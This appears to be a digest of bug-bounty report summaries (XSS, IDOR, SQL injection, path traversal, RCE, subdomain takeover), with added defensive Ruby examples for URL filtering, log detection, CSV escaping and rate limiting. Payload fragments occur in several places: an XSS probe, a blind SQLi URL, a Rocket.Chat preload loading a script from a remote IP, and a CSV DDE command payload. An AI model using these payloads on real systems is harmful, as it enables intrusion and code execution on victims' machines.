Mail.ru: REFLECTED XSS On http://jsgames.mail.ru/bad_browser.php via back_url parameter
Reflected XSS in jsgames.mail.ru via GET parameter...
Dropcontact: User can subscribe to a plan that is hidden by manipulating the value of the "subscription" parameter at [ https://app.dropcontact.io/app/checkout/]
When logging into Dropcontact, going into subscription and clicking on some plan, you have the id of the plan in the URL; someone could see a hidden plan by changing this parameter...
Equifax-vdp: Open SonarQube instance leaking internal source code
Summary I came across an open SonarQube instance which can be found here: http://34.238.92.229:9000/ In it, there are 10 projects with a total of around 100k lines of code. To identify the owner, I went to the Issues tab and expanded the list of authors. There were 29 people there, and many of...
Automattic: Reflected XSS on an Atavist theme
Summary: Hi team, I found a Reflected XSS in an Atavist theme and there are a lot of affected websites. I don't know the theme's name but it's in use at https://magazine.atavist.com/ Just write alert(document.domain) into the search field...
Shopify: staff can extend the Shopify trial period without admin permission
Description: My store's 14-day trial subscription had only 2 days remaining, and I saw that Shopify also offers shop admins the option to extend the trial period by another 14 days. I found an issue in which staff with no permission were also able to extend the trial period without admin permission. Steps to reproduce: -...
Rockset: S3 bucket data at http://rockset-support.s3-us-west-2.amazonaws.com/ reveals user addresses based on latitudes and longitudes.
At the S3 bucket located at http://rockset-support.s3-us-west-2.amazonaws.com/, a file was found called data.json.15 that contains, of interest, latitudes and longitudes of user addresses. F930036 Steps to reproduce: 1. Download the file in the bucket with the command: aws s3 sync s3://rockset-suppor...
Acronis: ClickJacking
I have found the vulnerability called Clickjacking. Please find the details below: Description Clickjacking is an exploit in which malicious coding is hidden beneath apparently legitimate buttons or other clickable content on a website. OWASP Benchmark A6- Security Misconfiguration Steps to...
Dropcontact: Nginx Server version disclosure.
Nginx Server version was returned by our server...
Courier: Bypass Too Many Requests Sign Up
Courier makes a rate limit check before allowing a user to register; this rate limit check can be bypassed and a user account can be created by sending a request directly to the AWS Cognito API – which is not rate limited...
GitLab: SafeParamsHelper::safe_params is not so safe
Summary GitLab uses SafeParamsHelper to filter out some keys before passing them to url_for: def safe_params; if params.respond_to?(:permit!) then params.except(:host, :port, :protocol).permit! else params end; end. The issue is that there are a lot more dangerous keys: RESERVED_OPTIONS = [:host,...
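The report above only shows the three keys GitLab stripped. The example below is added here to make the gap concrete; it is not GitLab's or Rails' code. It models url_for with a deliberately small stand-in (toy_url_for), and the RESERVED_OPTIONS list is written from memory of ActionDispatch::Routing::RouteSet::RESERVED_OPTIONS, so treat both the stand-in and the list as assumptions rather than as the framework's behaviour.

```ruby
# Added example (not GitLab's or Rails' code). Shows why stripping only
# :host, :port and :protocol is not enough when request params are passed
# to a url_for-style helper, and what a complete filter looks like.

# Assumed to mirror ActionDispatch::Routing::RouteSet::RESERVED_OPTIONS;
# verify against the Rails version you run.
RESERVED_OPTIONS = %i[
  host protocol port subdomain domain tld_length trailing_slash
  anchor params only_path script_name original_script_name relative_url_root
].freeze

# The filter shape described in the report: only three keys removed.
def weak_safe_params(params)
  params.reject { |k, _| %i[host port protocol].include?(k.to_sym) }
end

# Hardened filter: every reserved key is removed, so user input can only
# ever become an ordinary query-string parameter.
def strict_safe_params(params)
  params.reject { |k, _| RESERVED_OPTIONS.include?(k.to_sym) }
end

# Toy stand-in for url_for. It honours only the options needed to show
# the effect of :script_name and :only_path; real Rails does far more.
def toy_url_for(path, options)
  opts = options.transform_keys(&:to_sym)
  anchor      = opts.delete(:anchor)
  script_name = opts.delete(:script_name).to_s
  only_path   = opts.delete(:only_path)
  host        = opts.delete(:host) || "gitlab.example"
  protocol    = opts.delete(:protocol) || "https"
  RESERVED_OPTIONS.each { |k| opts.delete(k) } # remaining reserved keys never become query params
  query = opts.empty? ? "" : "?" + opts.map { |k, v| "#{k}=#{v}" }.join("&")
  base  = only_path ? "" : "#{protocol}://#{host}"
  "#{base}#{script_name}#{path}#{query}#{anchor ? "##{anchor}" : ""}"
end

# Constructed attacker input: host/port/protocol are untouched, but
# script_name plus only_path yields a protocol-relative URL to another host.
ATTACKER_PARAMS = { "script_name" => "//evil.example", "only_path" => true, "page" => "2" }.freeze

def weak_result
  toy_url_for("/search", weak_safe_params(ATTACKER_PARAMS))
end

def strict_result
  toy_url_for("/search", strict_safe_params(ATTACKER_PARAMS))
end
```

With the weak filter the browser receives //evil.example/search?page=2, which it resolves against the current scheme and leaves the site; with the strict filter the same input becomes a harmless page=2 query parameter on the expected host.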
MTN Group: [mtn.com.af] Multiple vulnerabilities allow application-level DoS
Issue Description Unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files from wp-includes/script-loader.php to construct a series of requests to load every file many times. The vulnerability is registered as CVE-2018-6389 76172...
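The snippet describes the CVE-2018-6389 pattern but stops before showing what the abusive requests look like in a log. The following is an added example, not part of the report: it scans constructed access-log lines for load-scripts.php / load-styles.php requests whose load[] lists carry an abnormal number of script handles. The log lines and the threshold are invented for the demonstration.

```ruby
require "cgi"
require "uri"

# Added example (not from the report). Detects WordPress load-scripts.php
# abuse (CVE-2018-6389 pattern) by counting the script handles requested
# in a single request. Log lines below are constructed, not real traffic.
BURST = (["eutil,common,wp-a11y,sack,quicktag,colorpicker,editor"] * 40).join(",")
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [10/Jul/2020:10:00:01 +0000] "GET /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate&ver=5.4 HTTP/1.1" 200 91234
  198.51.100.7 - - [10/Jul/2020:10:00:02 +0000] "GET /wp-admin/load-scripts.php?c=1&load%5B%5D=#{BURST} HTTP/1.1" 200 4123456
  203.0.113.9 - - [10/Jul/2020:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 5123
LOG

# Common/combined log format: client IP first, request target inside the quoted request line.
REQUEST_RE = /\A(?<ip>\S+) .*"(?:GET|POST) (?<target>\S+) HTTP\/[\d.]+"/

# Number of script handles one request asks for. Handles arrive as
# comma-separated lists in one or more load[] (or load) parameters.
def handle_count(target)
  uri = URI.parse(target)
  return 0 unless uri.path.end_with?("/load-scripts.php", "/load-styles.php")
  params = CGI.parse(uri.query.to_s)
  (params["load[]"] + params["load"]).sum { |v| v.split(",").reject(&:empty?).size }
end

# One hash per request whose handle count exceeds max_handles.
# A legitimate admin page asks for a few dozen handles at most; the
# attack pattern repeats the full list many times in one request.
def suspicious_load_requests(log, max_handles: 100)
  log.each_line.map do |line|
    m = REQUEST_RE.match(line)
    next unless m
    n = handle_count(m[:target])
    { ip: m[:ip], handles: n, target: m[:target] } if n > max_handles
  end.compact
end
```

Once flagged, the practical mitigations are to serve these endpoints only to authenticated users (WordPress has no auth on them by design) or to cap the request/URI length and the number of load[] entries at the web server or WAF.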
Yelp: RCE on build server via misconfigured pip install
The following Python library has been installed on at least one Yelp owned build server directly from the public PyPI registry. https://pypi.org/project/yelp-cgeom/ This package should normally be downloaded from the internal Yelp registry, but a misconfiguration appears to have caused it to be...
Rockset: A user with member privilege could access the https://console.rockset.com/billing?tab=payment page even though the billing page is hidden from the menu.
Summary: I am writing to submit a vulnerability found at https://console.rockset.com/. I created an admin account with email [email protected] and added a member with email [email protected]. I logged in from the member's account and realized that the Billing page is n...
Lark Technologies: [IDOR] Modify other team's reminders via reminderId parameter
An IDOR (Insecure Direct Object Reference) vulnerability was found in Larksuite reminders, allowing an attacker to modify any other user's reminder in the POST request via the "reminderId" parameter. We thank imrannisar for reporting this vulnerability and confirming its resolution...
TikTok: Cross Site Scripting using Email parameter in Ads endpoint 2
A cross site scripting vulnerability was found in an ads endpoint using the email parameter. This issue has been resolved. We thank @luizviana for reporting this to our team and confirming the resolution...
Shopify: Stored XSS in my staff name fired in one of your internal panels
Hi all, I had done lots of tests for bug bounty in my test store "trstore-3.myshopify.com", created about 4 years ago, and then one of your developers noticed that a stored cross-site scripting payload in my staff name fired in one of your internal panels. I have attached the email sent to me by your...
X (Formerly Twitter): Safe Redirect Bypass
Hello Team, Summary: The url below bypasses the safe redirect and redirects directly to the malicious website. http://evil.org/%00 The reason for this may be the fix in the report 921286. Steps: Tweet the url below: http://evil.org/%00 Thanks! @cyanpiny Impact The attacker can direct the victim...
Acronis: Arbitrary file creation via symlink attack on syncagentsrv (Acronis Sync Agent Service)
Issue class description Arbitrary file creation is a vulnerability that allows an attacker to create a file in an arbitrary location within the filesystem. This includes protected directories, such as C:\Windows, C:\windows\system32 and "C:\Program Files". If, in addition, the attacker has control over the file...
Acronis: Arbitrary DLL injection in mmsminisrv (Acronis Managed Machine Service Mini)
During initialization, the mmsmini.exe service binary of mmsminisrv loads the library C:\Program Files (x86)\Common Files\Acronis\Home\libssl10.dll. The library then tries to load a non-existing file: C:\bshudson\workspace\mod-openssl-fips-win\205\product\out\standard\vs2013release\OpenSSL\ssl\openssl.cnf. T...
Mail.ru: NPM_API_KEY Leak
Sensitive application configuration data related to samokat.ru was leaked on github.com...
QIWI: CVE-2020-3187 - unauthenticated arbitrary file deletion in Cisco
Steps to reproduce: I could delete arbitrary files from https://79.142.21.220/ using CVE-2020-3187. PoC video is attached. Browser/OS: Chrome/Windows ALSO Cisco ASA - Arbitrary File Read - CVE-2020-3452; the downloaded file is also attached here for PoC. Impact: RCE is a P1 critical vulnerability,...
Pornhub: XSS via JavaScript evaluation of an attacker controlled resource at www.pornhub.com
The researcher was able to execute arbitrary JavaScript code within the scope of the target domain by exploiting a reflected cross-site scripting vulnerability in a custom library...
Mail.ru: Forgot Password Page SMS Brute Force could lead to Account Takeover using Android/IOS app "About the house" via api.prodom.smart.space
Password recovery procedure was not sufficiently protected against bruteforce and allowed arbitrary smart.space account takeover...
GitHub Security Lab: Python : Add query to detect Server Side Template Injection
This bug was reported directly to GitHub Security Lab...
Internet Bug Bounty: Uncovering file quarantine and UX security issues in macOS apps ( .terminal, .fileloc and .url)
Slides : https://docs.google.com/presentation/d/19WeQbqcOKnrSv1I3Z4sm-oNAf6IVzHwRyQP4i9BvY/edit#slide=id.g758ad3e04223231 See Blogpost for more details - https://medium.com/@metnew/exploiting-popular-macos-apps-with-a-single-terminal-file-f6c2efdfedaa Summary Popular macOS apps with a file-sharing...
Rocket.Chat: Arbitrary file read in Rocket.Chat-Desktop
Description: Rocket.Chat-Desktop is vulnerable to arbitrary file read. Releases Affected: Rocket.Chat-Desktop-Client: v3.0.0-develop Steps To Reproduce by setting up a malicious server: 1. Go to Administration » Layout » Custom Scripts » Custom Script for Logged In Users 1. Insert the following...
Rocket.Chat: Remote Code Execution in Rocket.Chat-Desktop
Description: Rocket.Chat-Desktop is vulnerable to remote code execution. An attacker is able to create new BrowserWindow instances with a malicious preload script. Releases Affected: Rocket.Chat-Desktop-Client: ['PWNED', '', 'nodeIntegration=true', 'preload=\\45.155.173.235\data\cmd.js'].join(','...
U.S. Dept Of Defense: [██████████.mil] Cisco VPN Service Path Traversal
Hi team. Summary The Cisco VPN Service at ██████.mil is vulnerable to the CVE-2020-3452 vulnerability, which allows path traversing within the web service's file system on the targeted device. Steps to Reproduce Make a GET request to: http...
Mail.ru: tmgame.mail.ru - Blind sql injection
https://tmgame.mail.ru/action.php?xml=1&acode=comein&buildtype=all&bldID=selectfromselectsleep20a&bldlocID=8 bldID is the vulnerable GET parameter. Impact: Retrieving data from the database...
Khan Academy: CSV Injection Via Student Password/Name Leads To Client Side RCE And Reading Client Files
Insufficient CSV escaping could result in our site generating an unsafe CSV file for an end user under certain conditions. See the reporter's summary for more. Two CSV Injection Issues Were Discovered On Khan's Teacher CSV Export Function, That Could Allow Client Side Remote Code Execution, And...
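The entry names the root cause (insufficient CSV escaping) without showing what sufficient escaping is. Added example, not Khan Academy's code: a cell neutraliser that prefixes formula-triggering cells with a single quote and leaves the field quoting to Ruby's CSV writer. The export rows, the student name and the payloads are constructed for the demonstration.

```ruby
require "csv"

# Added example (not the site's code). Neutralises CSV/formula injection in
# exported spreadsheets. Sample rows below are constructed.

# Leading characters that make Excel, LibreOffice or Google Sheets evaluate
# a cell as a formula; tab and carriage return can also let a cell spill
# into a neighbouring one.
FORMULA_TRIGGERS = ["=", "+", "-", "@", "\t", "\r"].freeze

# Plain numbers such as "-5" or "+1.5" are harmless and should stay numeric.
PLAIN_NUMBER = /\A[+-]?\d+(?:\.\d+)?\z/

# Prefix a dangerous cell with a single quote, which spreadsheet apps read
# as "treat this as text". Checked both on the first character and on the
# first non-blank character, since leading spaces do not disarm a formula.
def neutralize_csv_cell(value)
  s = value.to_s
  return s if s.empty? || s.match?(PLAIN_NUMBER)
  dangerous = FORMULA_TRIGGERS.include?(s[0]) || FORMULA_TRIGGERS.include?(s.lstrip[0])
  dangerous ? "'" + s : s
end

# Build a CSV document in which every cell has been neutralised. CSV.generate
# quotes any field containing a comma, quote or newline and doubles embedded
# double quotes, so the formula cannot break out of its field either.
def safe_csv(rows)
  CSV.generate do |csv|
    rows.each { |row| csv << row.map { |cell| neutralize_csv_cell(cell) } }
  end
end

# Constructed export: one student set their name to a DDE payload, another
# set a password that is a HYPERLINK formula, a third has a numeric-looking value.
SAMPLE_ROWS = [
  ["name", "password"],
  ["=cmd|' /C calc'!A0", "hunter2"],
  ["Bob", "=HYPERLINK(\"http://evil.example\",\"click\")"],
  ["Carol", "-5"],
].freeze
```

Apply the neutraliser at export time only; the stored value stays as the user entered it, so other consumers of the data are not affected and the protection cannot be bypassed by a later code path that reads the raw field.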
PlayStation: SOCK_RAW sockets reachable from Webkit process allows triggering double free in IP6_EXTHDR_CHECK
Summary Memory corruption can be achieved by sending fragmented IPv6 packets to the loopback interface due to poor and inconsistent use of IP6_EXTHDR_CHECK. The macro IP6_EXTHDR_CHECK can free the mbuf if the packet is sent to the loopback interface. This fact is not considered in dest6_input, frag6_input and...
Imgur: Stored XSS in Post title (PoC)
Hello, Stored XSS in Post title, example: https://imgur.com/gallery/Y5JUzv3, Thanks Impact steal cookies and session...
GSA Bounty: Denial of service via cache poisoning on https://www.data.gov/
An attacker can persistently block access to any on https://www.data.gov/ by using cache poisoning with the h0st headers to cause a 502 response code. To replicate: load https://www.data.gov/ in your browser, look at Burp, add ?xyzxyz=1 as a cache buster, and add h0st headers h0st: wrtqvavjigwdvoq...
GSA Bounty: Wordpress Users Disclosure (/wp-json/wp/v2/users/) on data.gov
Summary: Hello TTS Bug bounty team! I have found data.gov User/admin usernames disclosed. Using REST API, we can see all the WordPress users/author with some of their information. Steps To Reproduce: You can find the information disclosure by going to data.gov/wp-json/wp/v2/users/ Supporting Vide...
Mail.ru: Subdomain Takeover at analyticstest.geekbrains.ru
Unused analyticstest.geekbrains.ru subdomain was delegated to tilda.cc and not claimed...
Weblate: Open Github Repo Leaking WEBLATE SECRET KEY
Team, While going through Github search I discovered a public repository which contains the Weblate Secret Key. Issue & PoC: Repo: https://github.com/WeblateOrg File: https://github.com/WeblateOrg/weblate/blob/592472958f7b847701c51b36f4768b9784219fa1/weblate/settings_docker.py SECRET_KEY = os.environ.get...
Ruby on Rails: Server-side template injection at ujs test server
I have found that in the server code for testing ujs in Rails, template injection is possible and that leads to RCE. Code: https://github.com/rails/rails/blob/v6.0.3.2/actionview/test/ujs/server.rb module UJS class Server Blade::Assets.environment get "/" => "tests#index" match "/echo" =>...
New Relic: One Click Remote Code Injection - *.blog.newrelic.com
With some social engineering, a WordPress admin could be convinced to click a malicious link to abuse a vulnerability in a WordPress plugin. This could lead to script execution or even code execution on the host. Vulnerability: A CSRF vulnerability has been found inside the Admin Panel leading to...
Mail.ru: Information Disclosure
Domain, site, application: www7.promo.plazius.ru Steps to reproduce 1. By nmap port scanning we know port 9049 is open. 2. After that, dirsearch shows Metrics in its results; open it in a browser. 3. Now open http://www7.promo.plazius.ru:9049/Metrics Here you will get internal metrics of the system. Impact This is...
Kubernetes: SSRF for kube-apiserver cloudprovider scene
Report Submission Form Summary: an attacker can create an admission webhook that causes SSRF against the cloud provider server (cloud providers like GKE, AKS, EKS). Kubernetes Version: kubernetes v1.18.6 Component Version: Docker version 19.03.6, build 369ce74a3c Steps To Reproduce: 1. Use the following command to create v1.18.6...
U.S. Dept Of Defense: https://█████ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability
Summary: https://████████ is vulnerable to a Read-Only Path Traversal Vulnerability Description: Get request parameters at the /+CSCOT+/translation-table and the /+CSCOT+/oem-customization are not properly sanitized which allows for reading files within the webroot directory that are not intended...
TikTok: Open Redirect Vulnerability on TikTok Ads Portal
An Open Redirect vulnerability was found that could expose the user session cookie potentially allowing an attacker to obtain access to an account on the TikTok ads portal...
Mail.ru: cross site scripting bypass session
Reflected XSS in cloud.mail.ru via cookie value...
IBM: CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability - https://esccvc.de.ibm.com
A vulnerability in the interface of Cisco Adaptive Security Appliance and Cisco Firepower Threat Defense (FTD) was reported to IBM, analyzed and has been remediated. Thank you to Khaled 0xelkomy...
lemlist: CVE-2019-19935 - DOM based XSS in the froala editor
Summary: A stored XSS flaw exists in the froala editor used in the web application. This can be triggered by using the code view of the editor. Steps To Reproduce: 1. Start a new campaign 2. Fill all the fields and choose the blank email template for the message 3. Switch to code editor view and inject "...
Mail.ru: Information Disclosure on www7.promo.plazius.ru
Performance metrics were available at www7.promo.plazius.ru...
Mail.ru: Information Disclosure on qa-delivery-srv.plazius.ru
Performance metrics were available at qa-delivery-srv.plazius.ru...
Zomato: Availing Zomato gold by using a random third-party `wallet_id`
We received a report from @pandaaaa wherein he demonstrated a way to avail Zomato Gold membership using random Zomato User's wallet. The report was triaged and rewarded with critical severity with a CVSS score of 9.3. It was considered critical since a random user's wallet could have been used fo...
lemlist: app.lemlist.com : Admin Panel Access
Hi team, Steps To Reproduce: While doing some analysis of the JavaScript files in app.lemlist.com I found interesting endpoints. is the admin panel and is not protected; any normal user can access the panel. Steps To Reproduce: Add details for how we can reproduce the issue 1. Log into your accoun...
Mail.ru: Improper Restriction of Excessive Authentication Attempts at http://terrafoot.ru/login.php (Rate Limit bypass via IP Rotation)
Password at terrafoot.ru was not sufficiently protected against bruteforce...
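The two Mail.ru entries above (the SMS brute force against api.prodom.smart.space and the IP-rotation bypass at terrafoot.ru) share one root cause: the attempt budget was tracked, if at all, per source IP, which an attacker resets by rotating addresses. The example below is added here and is not code from any of the programs listed; it is a sliding-window limiter that budgets attempts per target account as well as per IP, so rotating IPs does not reset the account's budget. Limits, window and the phone number are constructed values.

```ruby
# Added example (not from any report above). Sliding-window attempt limiter
# keyed on the *target account* and on the source IP, so that rotating IPs
# cannot reset the budget for one account. In production the two hashes
# would live in a shared store such as Redis; the in-memory form is enough
# to show the policy. Limits and window below are assumed values.
class AttemptLimiter
  def initialize(max_per_account: 5, max_per_ip: 20, window_seconds: 600)
    @max_per_account = max_per_account
    @max_per_ip = max_per_ip
    @window = window_seconds
    @by_account = Hash.new { |h, k| h[k] = [] }
    @by_ip = Hash.new { |h, k| h[k] = [] }
  end

  # Returns :allow, :account_limited or :ip_limited. Call it *before*
  # verifying the submitted SMS code or password, and record the attempt
  # whether or not the guess is right, so probing is never free.
  def check(account:, ip:, now: Time.now.to_f)
    prune!(@by_account[account], now)
    prune!(@by_ip[ip], now)
    return :account_limited if @by_account[account].size >= @max_per_account
    return :ip_limited if @by_ip[ip].size >= @max_per_ip
    @by_account[account] << now
    @by_ip[ip] << now
    :allow
  end

  private

  # Drop timestamps that have aged out of the window.
  def prune!(timestamps, now)
    timestamps.reject! { |t| t <= now - @window }
  end
end

# Constructed scenario: an attacker rotates through many IPs against one
# phone number, one attempt per second. Returns the decision for each attempt.
def simulate_ip_rotation(limiter, account:, ips:, now: 0.0)
  ips.each_with_index.map { |ip, i| limiter.check(account: account, ip: ip, now: now + i) }
end
```

For a 4 to 6 digit SMS code the per-account limit matters far more than the per-IP one: with 10,000 possible codes and a 5-attempt budget the attacker's success chance per code lifetime is 0.05%, whereas an IP-only limit of 20 lets a pool of 500 addresses exhaust the whole space. Pair the limit with a short code lifetime and invalidate the code after the budget is spent.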